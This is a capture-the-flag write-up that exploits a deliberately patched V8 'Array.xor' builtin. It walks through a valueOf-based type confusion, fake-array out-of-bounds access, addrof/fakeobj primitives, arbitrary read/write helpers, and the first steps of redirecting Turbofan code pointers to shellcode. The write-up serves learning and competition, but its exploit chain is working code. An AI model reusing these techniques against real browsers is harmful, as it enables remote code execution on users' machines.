ECSC2024

HOMEOPENECSC ROUND 3 WRITEUP

HOME

OPENECSC

ROUND 3

WRITEUP

// [pwn] Baby Array.xor (6 solves)

// Writeup author: @rebane2001

// Challenge author: @Bonfee

Challenge description

In case you need to xor doubles...

nc arrayxor.challs.open.ecsc2024.it 1337

Introduction
Part 1: Finding the memory corruption
Part 2: Breaking out of bounds
Part 3: Cooking up some primitives
Part 4: Code execution
Part 5: Please don't collect the garbage
Part 6: What could've been

Introduction

Despite having 7 Chrome CVEs, I've never actually exploited a memory corruption in its V8 JavaScript engine before. Baby array.xor, a challenge at this year's openECSC CTF, was my first time going from a V8 bug to popping a /bin/sh shell.

Most V8 exploits tend to have two stages to them - figuring out a unique way to trigger some sort of a memory corruption of at least one byte, and then following a common pattern of building upon that corruption to read arbitrary addresses (addrof), create fake objects (fakeobj), and eventually reach arbitrary code execution. This challenge was no different.

Baby Array.xor

6 solves 418 points pwn

In case you need to xor doubles...

nc arrayxor.challs.open.ecsc2024.it 38020

Attachments

array.xor.zip

Solves

#	Time	User
1	2024-05-15 18:02:34Z	rdj
2	2024-05-15 18:26:26Z	Diff-fusion
3	2024-05-16 04:25:57Z	crazyman
4	2024-05-16 09:52:43Z	hlt
5	2024-05-17 21:35:14Z	Popax21
6	2024-05-19 20:43:27Z	rebane2001 <- me :o

Part 1: Finding the memory corruption

The challenge consists of the V8 engine with some new functionality added through a patch:

/* Array.xor() let x = [0.1, 0.2, 0.3]; x.xor(5); */ BUILTIN(ArrayXor) { HandleScope scope(isolate); Factory *factory = isolate->factory(); Handle<Object> receiver = args.receiver(); if (!IsJSArray(*receiver) || !HasOnlySimpleReceiverElements(isolate, JSArray::cast(*receiver))) { THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly, factory->NewStringFromAsciiChecked("Nope"))); } Handle<JSArray> array = Handle<JSArray>::cast(receiver); ElementsKind kind = array->GetElementsKind(); if (kind != PACKED_DOUBLE_ELEMENTS) { THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly, factory->NewStringFromAsciiChecked("Array.xor needs array of double numbers"))); } // Array.xor() needs exactly 1 argument if (args.length() != 2) { THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly, factory->NewStringFromAsciiChecked("Array.xor needs exactly one argument"))); } // Get array len uint32_t length = static_cast<uint32_t>(Object::Number(array->length())); // Get xor value Handle<Object> xor_val_obj; ASSIGN_RETURN_FAILURE_ON_EXCEPTION(isolate, xor_val_obj, Object::ToNumber(isolate, args.at(1))); uint64_t xor_val = static_cast<uint64_t>(Object::Number(*xor_val_obj)); // Ah yes, xoring doubles.. Handle<FixedDoubleArray> elements(FixedDoubleArray::cast(array->elements()), isolate); FOR_WITH_HANDLE_SCOPE(isolate, uint32_t, i = 0, i, i < length, i++, { double x = elements->get_scalar(i); uint64_t result = (*(uint64_t*)&x) ^ xor_val; elements->set(i, *(double*)&result); }); return ReadOnlyRoots(isolate).undefined_value(); }

The patch adds a new Array.xor() prototype that can be used to xor all values within an array of doubles, let's try it:

arr = [0.1, 0.2, 0.3]

arr.xor(1337) // 0x539

arr

(3) [0.10000000000001079, 0.20000000000002158, 0.30000000000004035]

0: 0x3fb9999999999ca3
1: 0x3fc9999999999ca3
2: 0x3fd333333333360a

Quite the peculiar feature. It may seem a little confusing if you aren't familiar with IEEE 754 doubles, but it makes sense once we look at the hex representations of the values:

(double) 0.1 ^ (uint64) 1337 = (double) 0.10000000000001079

  0x3fb999999999999a

^ 0x0000000000000539

= 0x3fb9999999999ca3

It pretty much just interprets the double as an integer, and then performs the XOR operation on it. In this example we XORed the doubles with 0x539 (1337 in decimal), so the last three hex digits of each double changed. It's a pretty silly operation to perform on a double.

Just XORing doubles isn't going to get us anywhere though, since the values are stored in a doubles array (PACKED_DOUBLE_ELEMENTS¹) as just raw 64-bit doubles. All we can do is change some numbers around, but that's something we can already do without xor. It'd be a lot more interesting if we could run this xor thingie on a mixed array (PACKED_ELEMENTS) consisting of memory pointers to other JavaScript objects, because we could point the pointers to places in memory we're not supposed to.

Alright, let's try an array with an object in it then:

arr = [0.1, 0.2, {}] // PACKED_ELEMENTS array

arr.xor(1337)

TypeError: Array.xor needs array of double numbers

Hmm, seems like there's a check in-place to prevent us from doing this:

ElementsKind kind = array->GetElementsKind(); if (kind != PACKED_DOUBLE_ELEMENTS) { THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly, factory->NewStringFromAsciiChecked("Array.xor needs array of double numbers"))); }

But what if we create a double array, but then wrap it in an evil proxy?

arr = [0.1, 0.2, 0.3]

evilHandler = { get(target, prop, receiver) { console.log(`Got ${prop}!`); return Reflect.get(...arguments); } }

evil = new Proxy(arr, evilHandler)

evil

Got constructor!

Got length!

Got 0!

Got length!

Got 1!

Got length!

Got 2!

Got length!

(3) [0.1, 0.2, 0.3] // hehe, looks good!

0: 3fb999999999999a
1: 3fc999999999999a
2: 3fd3333333333333

arr.xor(1337)

Got xor!

TypeError: Nope

No dice, seems like they've thought of that too:

if (!IsJSArray(*receiver) || !HasOnlySimpleReceiverElements(isolate, JSArray::cast(*receiver))) { THROW_NEW_ERROR_RETURN_FAILURE(isolate, NewTypeError(MessageTemplate::kPlaceholderOnly, factory->NewStringFromAsciiChecked("Nope"))); }

The IsJSArray method makes sure that we are in fact passing an array, and the HasOnlySimpleReceiverElements method checks for anything sus² within the array or it's prototype.

Hmmph, this seems pretty well coded so far. There is no way for us to get anything other than a basic double array past these checks, and XORing such an array isn't going to accomplish anything. I went on to carefully examine other parts of the code for any possible flaws.

The length of the array gets stored in a uint32_t, and I thought that perhaps we could overflow this value, but it turns out you can't make an array that big:

arr = new Array(2**32)

RangeError: Invalid array length

I also tried messing with the length value, but v8 doesn't allow us to do that in a way that could be of use here:

arr = [1.1, 2.2, 3.3]

arr.length = "evil"

RangeError: Invalid array length

arr.__defineGetter__("length", () => 1337)

TypeError: Cannot redefine property: length

arr.length = 1337 // uh oh, our array is now a HOLEY_DOUBLE_ELEMENTS

arr.xor(1337)

TypeError: Array.xor needs array of double numbers

And then it hit me - we're only doing all those fancy checks on the array itself, but not the argument! We get the xor argument (Object::ToNumber(isolate, args.at(1))) after we're already past all the previous array checks, so perhaps we could turn the xor argument evil and put an object in the double array once we're already past the initial checks? Let's give it a shot:

arr = [1.1, 2.2, 3.3]

evil = { valueOf: () => { arr[0] = {}; return 1337; } }

arr.xor(evil) // our array turns into PACKED_ELEMENTS here!

arr

(3) [140508, 2.2, 140484] // waow!

0: 0x000449b8 (SMI)
1: 0x00044cbd (pointer to double)
2: 0x00044988 (SMI)

We're cooking!

Part 2: Breaking out of bounds

Now that we've found a way to put some objects in an array and mess with their pointer, we must figure out a way to turn them into primitives we can actually use. There are a few different ways to accomplish this from here. I'll go with the path I took originally, but see if you can figure out any other ways to get there - I'll share a couple (arguably better ones) at the end of the post.

But first, we should look at how v8 stores stuff in the memory so that we can figure out what our memory corruption looks like and what we can do with it. How could we do that?

With the d8 natives syntax and a debugger! If we launch d8 (the v8 shell) with the --allow-natives-syntax flag, we can use various debug functions such as %DebugPrint(obj) to examine what's going on with objects, and if we combine that with a debugger (gdb in this case) we can even check out the entire memory to understand it better. Let's try it:

$ gdb --args ./d8 --allow-natives-syntax <-- use d8 with the natives syntax in gdb GNU gdb (GDB) 14.2 (gdb) run <-- start d8 Starting program: /home/lyra/Desktop/array.xor/dist/d8 --allow-natives-syntax V8 version 12.7.0 (candidate) d8> arr = [1.1, 2.2, 3.3] <-- create an array [1.1, 2.2, 3.3] d8> %DebugPrint(arr) <-- debugprint the array DebugPrint: 0xa3800042be9: [JSArray] <-- we get the address here - map: 0x0a38001cb7c5 <Map[16](PACKED_DOUBLE_ELEMENTS)> [FastProperties] - prototype: 0x0a38001cb11d <JSArray[0]> - elements: 0x0a3800042bc9 <FixedDoubleArray[3]> [PACKED_DOUBLE_ELEMENTS] - length: 3 - properties: 0x0a3800000725 <FixedArray[0]> - All own properties (excluding elements): { 0xa3800000d99: [String] in ReadOnlySpace: #length: 0x0a3800025f85 <AccessorInfo name= 0x0a3800000d99 <String[6]: #length>, data= 0x0a3800000069 <undefined>> (const accessor descriptor, attrs: [W__]), location: descriptor } - elements: 0x0a3800042bc9 <FixedDoubleArray[3]> { 0: 1.1 1: 2.2 2: 3.3 } 0xa38001cb7c5: [Map] in OldSpace - map: 0x0a38001c01b5 <MetaMap (0x0a38001c0205 <NativeContext[295]>)> - type: JS_ARRAY_TYPE - instance size: 16 - inobject properties: 0 - unused property fields: 0 - elements kind: PACKED_DOUBLE_ELEMENTS - enum length: invalid - back pointer: 0x0a38001cb785 <Map[16](HOLEY_SMI_ELEMENTS)> - prototype_validity cell: 0x0a3800000a89 <Cell value= 1> - instance descriptors #1: 0x0a38001cb751 <DescriptorArray[1]> - transitions #1: 0x0a38001cb7ed <TransitionArray[4]> Transition array #1: 0x0a3800000e5d <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x0a38001cb805 <Map[16](HOLEY_DOUBLE_ELEMENTS)> - prototype: 0x0a38001cb11d <JSArray[0]> - constructor: 0x0a38001cae09 <JSFunction Array (sfi = 0xa380002b2f9)> - dependent code: 0x0a3800000735 <Other heap object (WEAK_ARRAY_LIST_TYPE)> - construction counter: 0 [1.1, 2.2, 3.3] d8> ^Z <-- suspend d8 (ctrl+z) to get to gdb Thread 1 "d8" received signal SIGTSTP, Stopped (user). 0x00007ffff7da000a in read () from /usr/lib/libc.so.6 (gdb) x/8xg 0xa3800042be9-1 <-- examine the array's address 0xa3800042be8: 0x00000725001cb7c5 0x0000000600042bc9 0xa3800042bf8: 0x00bab9320000010d 0x7566280a00000adc 0xa3800042c08: 0x29286e6f6974636e 0x20657375220a7b20 0xa3800042c18: 0x3b22746369727473 0x6d2041202f2f0a0a (gdb)

In this example I made an array, used DebugPrint to see it's address, and then used gdb's x/8xg³ command to see the memory around that address. Going forward I'll be cleaning up the examples shown in the writeup, but this is essentially how you can follow along at home.

You'll notice I subtracted 1 from the memory address before viewing it - that's because of tagged pointers! In a PACKED_ELEMENTS array (and many other V8 structures), SMIs (SMall Integers) that end with a 0 bit (even) are shifted and stored directly, but everything ending with a 1 bit (odd) gets interpreted as a pointer, so a pointer to 0x1000 gets stored as 0x1001. Because of this, we have to subtract 1 from all tagged pointers before checking out their address.

But let's try to understand what the gdb output above means:

DebugPrint: 0xa3800042be9: [JSArray] - map: 0x0a38001cb7c5 <Map[16](PACKED_DOUBLE_ELEMENTS)> [FastProperties] - prototype: 0x0a38001cb11d <JSArray[0]> - elements: 0x0a3800042bc9 <FixedDoubleArray[3]> [PACKED_DOUBLE_ELEMENTS] - length: 3 - properties: 0x0a3800000725 <FixedArray[0]> - All own properties (excluding elements): { 0xa3800000d99: [String] in ReadOnlySpace: #length: 0x0a3800025f85 <AccessorInfo name= 0x0a3800000d99 <String[6]: #length>, data= 0x0a3800000069 <undefined>> (const accessor descriptor, attrs: [W__]), location: descriptor } - elements: 0x0a3800042bc9 <FixedDoubleArray[3]> { 0: 1.1 1: 2.2 2: 3.3 }

GDB

0xa3800042bb8: 0x00000004000005e5
0xa3800042bc0: 0x001d3377020801a4 0xa3800042bc8: 0x00000006000008a9
0xa3800042bd0: 0x3ff199999999999a 0xa3800042bd8: 0x400199999999999a
0xa3800042be0: 0x400a666666666666 0xa3800042be8: 0x00000725001cb7c5
0xa3800042bf0: 0x0000000600042bc9 0xa3800042bf8: 0x00bab9320000010d
0xa3800042c00: 0x7566280a00000adc

ENG

The array is at 0xa3800042be8, its properties list is empty, it's a PACKED_DOUBLE_ELEMENTS array with a length of 3⁴ at 0xa3800042bc8. At that address we find a FixedDoubleArray with a length of 3 (again) and the doubles 1.1, 2.2, and 3.3.

⁴

Try hovering overtapping on the text and stuff above. You'll see what the memory values mean and how they're represented in the %DebugPrint output.

You may be wondering why the memory only contains half the address - 0xa3800042bc8 is stored as 0x00042bc9 for example. This is V8's pointer compression and for our purposes all it does is make pointers be just the lower 32 bits of an address.

Pretty cool, let's see what happens if we put an array inside of another array:

arr2 = [arr]

DebugPrint: 0xa3800044a31: [JSArray] - map: 0x0a38001cb845 <Map[16](PACKED_ELEMENTS)> [FastProperties] - prototype: 0x0a38001cb11d <JSArray[0]> - elements: 0x0a3800044a25 <FixedArray[1]> [PACKED_ELEMENTS] - length: 1 - properties: 0x0a3800000725 <FixedArray[0]> - All own properties (excluding elements): { 0xa3800000d99: [String] in ReadOnlySpace: #length: 0x0a3800025f85 <AccessorInfo name= 0x0a3800000d99 <String[6]: #length>, data= 0x0a3800000069 <undefined>> (const accessor descriptor, attrs: [W__]), location: descriptor } - elements: 0x0a3800044a25 <FixedArray[1]> { 0: 0x0a3800042be9 <JSArray[3]> }

GDB

0xa3800044a10: 0x000005e5000449f5
0xa3800044a18: 0x1d1a6d7400000004 0xa3800044a20: 0x0000056d001d3fb7
0xa3800044a28: 0x00042be900000002 0xa3800044a30: 0x00000725001cb845
0xa3800044a38: 0x0000000200044a25 0xa3800044a40: 0x00000725001cb845
0xa3800044a48: 0x0000000200044b99

ENG

The PACKED_ELEMENTS array is at 0xa3800044a30, its 1 element is at 0xa3800044a24 in a FixedArray[1] and the element is a pointer to the previous array at 0xa3800042be8.

The memory order of the elements part here looks a little odd because it doesn't align with the 64-bit words and we're looking at little endian memory. This is a bit counter-intuitive because instead of reading the offset value as 0x0000000011112222 0x3333444400000000 you have to read it as 0x3333444400000000 0x0000000011112222.

Here's a fun little widget to play around with the concept:

0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000

read bytes as: |
if offset by: |

111122223333444400000000000000001111222233334444
0 1 2 3 4 5 6 7 8 drag this ->

The array in our array is just stored as a pointer to that array! At the moment it is pointing at 0xa3800042be8 which has our double array, but if we XOR this pointer to a different address we can make it point to any array or object we want... even if it doesn't "actually" exist!

Let's try to make a new array appear out of thin air. To do that, we have to put something in the memory that looks like an array, and then use XOR to point a pointer to it. I'm going to reuse the header of our first array at 0xa3800042be8, changing the memory addresses to match our new fake array.

GDB

0x??????????: 0x????????????????0x??????????: 0x00000100000008a9 0x??????????: 0x00000725001cb7c5
0x??????????: 0x0000010000042bd1

ENG

Fake PACKED_DOUBLE_ELEMENTS array with an empty properties list, with 128 elements at 0x???00042bd0. At that address we will have a FixedDoubleArray with a length of 128.

That looks like a pretty good fake! And the length of 128 elements is a bonus - letting us read and write far more than we should be able to. To put this fake array in the memory, we must first convert it into floats so we can use it within an array. There are many ways to do that, but the easiest method within JavaScript is to share the same ArrayBuffer between a Float64Array and a BigUint64Array.

buffer = new ArrayBuffer(8)

floatBuffer = new Float64Array(buffer)

int64Buffer = new BigUint64Array(buffer)

i2f = (i) => { int64Buffer[0] = i; return floatBuffer[0]; }

i2f(0x00000725001cb7c5n)

3.881131231533e-311

Pretty easy! You'll notice I appended an n to our hex value - this is just to convert it to a BigInt, which is required for the BigUint64Array but also gives us better accuracy in general⁵.

Let's put these values in the array from earlier:

arr[0] = i2f(0x00000100000008a9n)

arr[1] = i2f(0x00000725001cb7c5n)

arr[2] = i2f(0x0000010000042bd1n)

arr

(3) [5.432309235825e-312, 3.881131231533e-311, 5.432310575454e-312]

0: 0x00000100000008a9
1: 0x00000725001cb7c5
2: 0x0000010000042bd1

So our original real array starts at 0xa3800042be8, and we have our cool new fake array in the memory at 0xa3800042bd8, so what we can do now is put our real array in a third array with the evil getter trick, and then XOR the pointer to make it point to the fake array.

arr3 = [1.1]

evil = { valueOf: () => { arr3[0] = arr; const realArray = 0xa3800042be8n; const fakeArray = 0xa3800042bd8n; return Number(realArray ^ fakeArray); } }

arr3.xor(evil)

arr3[0]

(128) [3.881131231533e-311, 5.432310575454e-312, 3.881131231533e-311, 1.27321098e-313, 3.8055412126965747e-305, 3.3267913058887005e+257, 2.0317942745751732e-110, 1.2799112976201688e-152, 7.632660997817179e-24, 4.48268017468496e+217, 2.502521315148532e+262, 8.764262388001722e+252, 3.031075143147101e-152, 5.328171041616219e+233, 5.5199981093443586e+228, 7.495112028514905e+247, (112 more)...]

0: 0x00000725001cb7c5
1: 0x0000010000042bd1
2: 0x00000725001cb7c5
3: 0x0000000600042bc9
4: 0x00bab9320000010d
5: 0x7566280a00000adc
6: 0x29286e6f6974636e
7: 0x20657375220a7b20
8: 0x3b22746369727473
9: 0x6d2041202f2f0a0a
10: 0x76696e752065726f
11: 0x7473206c61737265
12: 0x20796669676e6972
13: 0x7075732074616874
14: 0x6f6d207374726f70
15: 0x7365707974206572
(112 more)...

Wow! That fake array of ours has lots of cool data that we didn't put there. Let's see what it looks like in the memory.

DebugPrint: 0xa3800042bd9: [JSArray] - map: 0x0a38001cb7c5 <Map[16](PACKED_DOUBLE_ELEMENTS)> [FastProperties] - prototype: 0x0a38001cb11d <JSArray[0]> - elements: 0x0a3800042bd1 <FixedDoubleArray[128]> [PACKED_DOUBLE_ELEMENTS] - length: 128 - properties: 0x0a3800000725 <FixedArray[0]> - All own properties (excluding elements): { 0xa3800000d99: [String] in ReadOnlySpace: #length: 0x0a3800025f85 <AccessorInfo name= 0x0a3800000d99 <String[6]: #length>, data= 0x0a3800000069 <undefined>> (const accessor descriptor, attrs: [W__]), location: descriptor } - elements: 0x0a3800042bd1 <FixedDoubleArray[128]> { 0: 3.88113e-311 1: 5.43231e-312 2: 3.88113e-311 3: 1.27321e-313 4: 3.80554e-305 5: 3.32679e+257 6: 2.03179e-110 7: 1.27991e-152 8: 7.63266e-24 9: 4.48268e+217 10: 2.50252e+262 11: 8.76426e+252 12: 3.03108e-152 13: 5.32817e+233 14: 5.52e+228 15: 7.49511e+247 ... }

GDB

0xa3800042bb8: 0x00000004000005e5
0xa3800042bc0: 0x001d3377020801a4 0xa3800042bc80xa3800042bc8: 0x00000006000008a9
0xa3800042bd0: 0x00000100000008a9 0xa3800042bd8: 0x00000725001cb7c5
0xa3800042be0: 0x0000010000042bd1 0xa3800042be8: 0x00000725001cb7c5
0xa3800042bf0: 0x0000000600042bc9 0xa3800042bf8: 0x00bab9320000010d
0xa3800042c00: 0x7566280a00000adc 0xa3800042c08: 0x29286e6f6974636e
0xa3800042c10: 0x20657375220a7b20 0xa3800042c18: 0x3b22746369727473
0xa3800042c20: 0x6d2041202f2f0a0a 0xa3800042c28: 0x76696e752065726f
0xa3800042c30: 0x7473206c61737265 0xa3800042c38: 0x20796669676e6972
0xa3800042c40: 0x7075732074616874 0xa3800042c48: 0x6f6d207374726f70
0xa3800042c50: 0x7365707974206572

That's so cool!! It really is just picking up the next 1024 bytes of memory as doubles, letting us see it all by just looking at the array. In fact, we can even see the original arr array's header in elements 2 and 3, let's try to read it out from within JavaScript. We'll want a function to turn floats back into hex, for that we can just create the reverse of the i2f function from earlier.

f2i = (f) => { floatBuffer[0] = f; return int64Buffer[0]; }

arr3[0][2]

3.881131231533e-311

f2i(arr3[0][2])

7855497066437n

f2i(arr3[0][2]).toString(16)

'725001cb7c5' // 0x00000725001cb7c5

Exciting! Let's overwrite arr's header with some random stuff and see what happens.

arr

(3) [5.432309235825e-312, 3.881131231533e-311, 5.432310575454e-312]

0: 0x00000100000008a9
1: 0x00000725001cb7c5
2: 0x0000010000042bd1

arr3[0][2] = i2f(0x1337133713371337n)

arr

Received signal 11 SEGV_ACCERR 0a381337133e ==== C stack trace =============================== [0x555557b9ea23] [0x555557b9e972] [0x7ffff7cdae20] [0x555556d3190b] [0x555557a12ff6] [end of stack trace] Segmentation fault (core dumped)

Whoops, yeah... there's the rub. The memory we're playing with is rather fragile and randomly changing stuff around is going to end up with a crash.

We'll have to be a bit more careful going forward if we want to end up with anything more than a segmentation fault. And there's more to worry about later down the line because v8 also has a garbage collector that likes to swoop in every once in a while to rearrange the memory.

This is a good time to figure out a plan for getting our primitives cooked up though.

Part 3: Cooking up some primitives

In JavaScript exploitation, a memory corruption is usually turned into the addrof and fakeobj primitives. addrof is a function that tells us the address of a JavaScript object, and fakeobj is a function that returns a pointer to a memory address to be interpreted as an object, similar to what we did to create our fake array earlier.

Let's take our research so far and wrap it up in a nice little script.

The beginning of the script sets up some helper functions. Then we create an array to store our fake array in as before, and also another array that has a random object in it.

To set up the fake array, we must know where our real array is at in memory. There are ways to accomplish this, but for now we'll just run %DebugPrint and use its output to change the arrAddr value in the code to what the memory address should be. This approach works okay in a controlled environment like ours (we'll need to keep updating the address as we change the code), but breaks apart when attacking browsers in the real world. I'll show how to overcome this shortcoming later in the post.

We can then guess how the rest of the memory lines up and use offsets to set a few other variables, such as the fakeElementsAddr which we add to the header of the fake array so that it points to where the fake array's elements are.

Once everything's set up we do the xor exploit thing and end up with the fake array in tmp[0]. We assign it to the oob variable for convenience and print its memory out in a format similar to the gdb output. Let's run it!

VARS

arr = [5.43231e-312, 3.88113e-311, 5.43231e-312] // 0x000432f9 tmpObj = {a: 1} // 0x00043309 objArr = [tmpObj] // 0x00043341 oob = [...] // 0x000432e9

OUT

$ ./d8 --allow-natives-syntax exploit.js 0x000432e8: 0x00000725001cb7c5 0x000432f0: 0x00000100000432e1 0x000432f8: 0x00000725001cb7c5 0x00043300: 0x00000006000432d9 0x00043308: 0x00000725001d3b05 0x00043310: 0x0000000200000725 0x00043318: 0x0001000100000685 0x00043320: 0x0000074d00000000 0x00043328: 0x0000008400002af1 0x00043330: 0x0000056d00000002 0x00043338: 0x0004330900000002 0x00043340: 0x00000725001cb845 0x00043348: 0x0000000200043335 ...

Neat! If we stare at the patterns in the memory we can make out the other arrays and stuff we initialized earlier. And if you think about it, we pretty much already have the addrof and fakeobj primitives here. At index 10, we can get the address of the object currently in objArr, so if we put an object of our choice in that array we can see its address. And if we put an address to an object at that index, we'll be able to access it through the objArr array. That'll be our addrof and fakeobj!

Let's write the primitives to get and set the upper 32 bits:

function addrof(o) { objArr[0] = o; return f2i(oob[10]) >> 32n; } function fakeobj(a) { const temp = f2i(oob[10]) & 0xFFFFFFFFn; oob[10] = i2f(temp + (a << 32n)); return objArr[0]; }

If the address were at the lower bits instead, we'd need to modify the code a bit accordingly:

function addrof(o) { objArr[0] = o; return f2i(oob[10]) & 0xFFFFFFFFn; } function fakeobj(a) { const temp = f2i(oob[10]) & 0xFFFFFFFF00000000n; oob[10] = i2f(temp + a); return objArr[0]; }

Time to try them out! Let's do an experiment where we first try to get the address of our fake array, and then turn that address into a new pointer to that array.

hex32(addrof(oob))

'0x000432e9'

fakeArray = fakeobj(0x000432e9n)

fakeArray

(128) [3.881131231533e-311, 5.432310575454e-312, 3.881131231533e-311, 1.27321098e-313, (124 more)...]

0: 0x00000725001cb7c5
1: 0x0000010000042bd1
2: 0x00000725001cb7c5
3: 0x0000000600042bc9
(124 more)...

Sweet! The pointer addresses here are tagged, so they're 1 bigger than the actual memory locations. We could make addrof and fakeobj subtract and add 1 to see and use the actual memory addresses, but it's a matter of taste.

Lastly we'll want to create primitives to arbitrarily read and write memory. To do that, we can create a new array, point it at any memory location we desire, and then read or write its first element. Although we did set the length of an array in two separate memory locations earlier, it turns out this isn't always required depending on what we want to do. If we just want to read or write a single double, we can just specify the desired address in the array header and it'll do the trick.

function read(addr) { const readArr = [1.1, 2.2]; readArr[0] = i2f(0x00000725001cb7c5n); // array header from earlier readArr[1] = i2f(0x0000000200000000n + addr - 0x8n); return f2i(fakeobj(addrof(readArr) - 0x10n)[0]); } function write(addr, data) { const writeArr = [1.1, 2.2]; writeArr[0] = i2f(0x00000725001cb7c5n); writeArr[1] = i2f(0x0000000200000000n + addr - 0x8n); const fakeArr = fakeobj(addrof(writeArr) - 0x10n); fakeArr[0] = i2f(data); }

Did you know that strings in JavaScript are immutable! Anyways let's mutate them using the cool new functions we cooked up.

text = "ponypony"

'ponypony'

textAddr = addrof(text)

hex32(textAddr)

'0x001d35fd'

hex64(read(textAddr))

'0x430b3ed2000003dd'

hex64(read(textAddr + 0xcn))

'0x796e6f70796e6f70' // ynopynop

write(textAddr + 0xcn, 0x6172796c6172796cn) // arylaryl

text

'lyralyra'

We've done the impossible! Imagine how much we're gonna be able to speed up the performance of our webapps by running this exploit and making strings mutable.

Part 4: Code execution

So we can read and write any memory, how do we turn this into code execution?

We'd probably want to start by looking at how code gets stored and run for functions and stuff.

function func() { return 0x1337; }

func()

4919

%DebugPrint(func)

DebugPrint: 0x3069001d34c9: [Function] in OldSpace - map: 0x3069001c097d <Map[32](HOLEY_ELEMENTS)> [FastProperties] - prototype: 0x3069001c08a5 <JSFunction (sfi = 0x306900141885)> - elements: 0x306900000725 <FixedArray[0]> [HOLEY_ELEMENTS] - function prototype: - initial_map: - shared_info: 0x3069001d3439 <SharedFunctionInfo func> - name: 0x3069001d33bd <String[4]: #func> - builtin: InterpreterEntryTrampoline - formal_parameter_count: 0 - kind: NormalFunction - context: 0x3069001c0205 <NativeContext[295]> - code: 0x306900032cc1 <Code BUILTIN InterpreterEntryTrampoline> - interpreted - bytecode: 0x3069002006a5 <BytecodeArray[5]> - source code: () { return 0x1337 } - properties: 0x306900000725 <FixedArray[0]> - All own properties (excluding elements): { ... } - feedback vector: No feedback vector, but we have a closure feedback cell array

GDB

0x3069001d34c8: 0x00000725001c097d
0x3069001d34d0: 0x00032cc100000725 0x3069001d34d8: 0x001c0205001d3439
0x3069001d34e0: 0x00000741001d34b1 0x3069001d34e8: 0x001d33bd00000a91
0x3069001d34f0: 0x001d34c9000084a0

Ooh we've got something called code there! But it's some sort of InterpreterEntryTrampoline, what's that?

Looking it up, it seems like it's bytecode generated by Ignition. This V8-specific bytecode is run by a VM and is made specifically for JavaScript. It won't be much use to us because we want to run computer code that can hack a computer, not chrome code that can hack a website. Looking further into V8 docs we find Maglev and Turbofan, the latter of which seems like a great fit for us because it compiles into machine code.

But our function is still the trampoline thing! How do we turn it into a turbofan thing?

We need to make V8 think it's important to optimize our code by running it a lot of times, or using debug commands. If we still have the V8 natives syntax enabled from earlier, we can use %PrepareFunctionForOptimization() and %OptimizeFunctionOnNextCall() to do the trick.

function func() { return 0x1337; }

%DebugPrint(func)

DebugPrint: 0x2d7a001d3fb9: [Function] in OldSpace - code: 0x2d7a000332c1 <Code BUILTIN CompileLazy>

func()

4919

%DebugPrint(func)

DebugPrint: 0x2d7a001d3fb9: [Function] in OldSpace - code: 0x2d7a00032cc1 <Code BUILTIN InterpreterEntryTrampoline>

%PrepareFunctionForOptimization(func)

func()

4919

%DebugPrint(func)

DebugPrint: 0x2d7a001d3fb9: [Function] in OldSpace - code: 0x2d7a00032cc1 <Code BUILTIN InterpreterEntryTrampoline>

%OptimizeFunctionOnNextCall(func)

func()

4919

%DebugPrint(func)

DebugPrint: 0x2d7a001d3fb9: [Function] in OldSpace - code: 0x2d7a002006ed <Code TURBOFAN>

codeObj = fakeobj(0x002006ed)

%DebugPrint(codeObj)

DebugPrint: 0x2d7a002006ed: [Code] - map: 0x2d7a00000d61 <Map[64](CODE_TYPE)> - kind: TURBOFAN - deoptimization_data_or_interpreter_data: 0x2d7a0020066d <Other heap object (PROTECTED_FIXED_ARRAY_TYPE)> - position_table: 0x2d7a00180011 <Other heap object (TRUSTED_BYTE_ARRAY_TYPE)> - instruction_stream: 0x5555b79416f1 <InstructionStream TURBOFAN> - instruction_start: 0x5555b7941700 - is_turbofanned: 1 - stack_slots: 6 - marked_for_deoptimization: 0 - embedded_objects_cleared: 0 - can_have_weak_objects: 1 - instruction_size: 124 - metadata_size: 12 - inlined_bytecode_size: 0 - osr_offset: -1 - handler_table_offset: 12 - unwinding_info_offset: 12 - code_comments_offset: 12 - instruction_stream.relocation_info: 0x2d7a002006dd <Other heap object (TRUSTED_BYTE_ARRAY_TYPE)> - instruction_stream.body_size: 136 --- Disassembly: --- kind = TURBOFAN stack_slots = 6 compiler = turbofan address = 0x2d7a002006ed Instructions (size = 124) 0x5555b7941700 0 8b59f4 movl rbx,[rcx-0xc] 0x5555b7941703 3 4903de REX.W addq rbx,r14 0x5555b7941706 6 f6431e20 testb [rbx+0x1e],0x20 0x5555b794170a a 0f85f05e03a0 jnz 0x555557977600 (CompileLazyDeoptimizedCode) ;; near builtin entry 0x5555b7941710 10 55 push rbp 0x5555b7941711 11 4889e5 REX.W movq rbp,rsp 0x5555b7941714 14 56 push rsi 0x5555b7941715 15 57 push rdi 0x5555b7941716 16 50 push rax 0x5555b7941717 17 4883ec08 REX.W subq rsp,0x8 0x5555b794171b 1b 493b65a0 REX.W cmpq rsp,[r13-0x60] (external value (StackGuard::address_of_jslimit())) 0x5555b794171f 1f 0f861f000000 jna 0x5555b7941744 <+0x44> ...

GDB [0x2d7a002006ed]

0x2d7a002006ec: 0x0020066d00000d61
0x2d7a002006f4: 0x001d485100180011 0x2d7a002006fc: 0xb7941700b79416f1
0x2d7a00200704: 0x800000dc00005555

GDB [0x5555b7941700]

0x5555b7941700: 0x43f6de0349f4598b
0x5555b7941708: 0xa0035ef0850f201e 0x5555b7941710: 0x48505756e5894855
0x5555b7941718: 0x0fa0653b4908ec83

Awesome, we have a code object that points to an address where the code gets run from, and we can change it to whatever we want. Let's make a part of the memory just the 0xCC INT3 breakpoint opcode - this will temporarily pause the execution and send a SIGTRAP signal to gdb so we can look into the current state.

funcAddr = addrof(func)

hex32(funcAddr)

'0x001d3fb9'

codeAddr = read(funcAddr + 0x8n) >> 32n

hex32(codeAddr)

'0x002006ed'

instructionStart = codeAddr + 0x14n

hex64(read(instructionStart))

'0x00005555b7941700'

instructions = [i2f(0xCCCCCCCCCCCCCCCCn), 2.2]

instructions

(2) [-9.255963134931783e+61, 2.2]

0: 0xcccccccccccccccc
1: 0x400199999999999a

